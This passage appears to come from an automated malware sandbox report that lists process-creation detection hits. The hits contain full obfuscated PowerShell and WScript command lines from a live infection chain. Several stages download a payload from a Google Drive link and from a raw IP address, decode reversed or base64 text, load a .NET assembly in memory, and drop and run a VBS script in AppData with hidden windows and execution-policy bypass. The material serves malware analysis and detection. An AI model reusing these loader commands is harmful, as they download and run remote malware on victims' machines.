-join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativad
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , ProcessId: 1384, ProcessName: wscript.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhz
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe, ProcessId: 7988, ProcessName: powershell.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" , ProcessId: 1384, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhz
